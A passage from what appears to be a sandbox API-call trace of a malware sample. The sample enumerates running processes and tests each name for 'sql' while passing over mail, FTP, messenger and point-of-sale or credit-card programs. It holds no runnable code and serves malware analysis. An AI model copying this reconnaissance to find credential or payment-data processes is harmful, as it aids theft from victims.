lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0165.735] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0165.735] StrStrIA (lpFirst="fling.exe", lpSrch="sql") returned 0x0 [0165.735] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0165.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0165.737] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3597028 [0165.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3597028, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0165.737] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0165.737] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sql") returned 0x0 [0165.737] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0165.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.739] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3597048 [0165.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3597048, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0165.739] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0165.739] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sql") returned 0x0 [0165.739] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0165.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0165.740] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e2a8 [0165.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e2a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0165.740] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0165.740] StrStrIA (lpFirst="icq.exe", lpSrch="sql") returned 0x0 [0165.740] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0165.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.742] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584a78 [0165.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584a78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0165.742] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0165.742] StrStrIA (lpFirst="leechftp.exe", lpSrch="sql") returned 0x0 [0165.742] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0165.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0165.743] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584988 [0165.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0165.743] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0165.743] StrStrIA (lpFirst="ncftp.exe", lpSrch="sql") returned 0x0 [0165.743] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0165.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.745] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35848c8 [0165.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35848c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0165.745] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0165.745] StrStrIA (lpFirst="notepad.exe", lpSrch="sql") returned 0x0 [0165.745] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0165.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0165.746] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584868 [0165.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3584868, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0165.747] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0165.747] StrStrIA (lpFirst="operamail.exe", lpSrch="sql") returned 0x0 [0165.747] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0165.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.748] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584a90 [0165.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3584a90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0165.749] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0165.749] StrStrIA (lpFirst="pidgin.exe", lpSrch="sql") returned 0x0 [0165.749] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0165.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0165.750] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584aa8 [0165.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584aa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0165.750] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0165.750] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sql") returned 0x0 [0165.750] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0165.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0165.752] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35847f0 [0165.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x35847f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0165.752] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0165.752] StrStrIA (lpFirst="skype.exe", lpSrch="sql") returned 0x0 [0165.752] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0165.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.754] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584808 [0165.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584808, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0165.754] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0165.754] StrStrIA (lpFirst="smartftp.exe", lpSrch="sql") returned 0x0 [0165.754] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0165.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.756] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584820 [0165.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3584820, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0165.756] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0165.756] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sql") returned 0x0 [0165.756] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0165.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.757] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35849a0 [0165.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x35849a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0165.757] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0165.757] StrStrIA (lpFirst="trillian.exe", lpSrch="sql") returned 0x0 [0165.757] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0166.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.118] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584298 [0166.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3584298, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0166.118] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0166.118] StrStrIA (lpFirst="webdrive.exe", lpSrch="sql") returned 0x0 [0166.118] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0166.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.119] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584208 [0166.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3584208, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0166.120] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0166.120] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sql") returned 0x0 [0166.120] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0166.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.121] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35842e0 [0166.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x35842e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0166.121] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0166.121] StrStrIA (lpFirst="winscp.exe", lpSrch="sql") returned 0x0 [0166.121] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0166.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0166.122] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3597248 [0166.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3597248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0166.122] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0166.123] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sql") returned 0x0 [0166.123] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0166.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0166.126] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3597068 [0166.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3597068, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0166.126] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0166.126] StrStrIA (lpFirst="active-charge.exe", lpSrch="sql") returned 0x0 [0166.126] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0166.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.128] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35843e8 [0166.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35843e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0166.128] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0166.128] StrStrIA (lpFirst="accupos.exe", lpSrch="sql") returned 0x0 [0166.128] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0166.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0166.129] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35848e0 [0166.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x35848e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0166.129] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0166.129] StrStrIA (lpFirst="afr38.exe", lpSrch="sql") returned 0x0 [0166.129] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0166.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.131] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584958 [0166.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3584958, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0166.131] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0166.131] StrStrIA (lpFirst="aldelo.exe", lpSrch="sql") returned 0x0 [0166.131] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0166.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0166.132] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3584850 [0166.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3584850, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0166.132] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0166.132] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sql") returned 0x0 [0166.132] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0166.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0166.134] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3597088 [0166.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3597088, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0166.134] 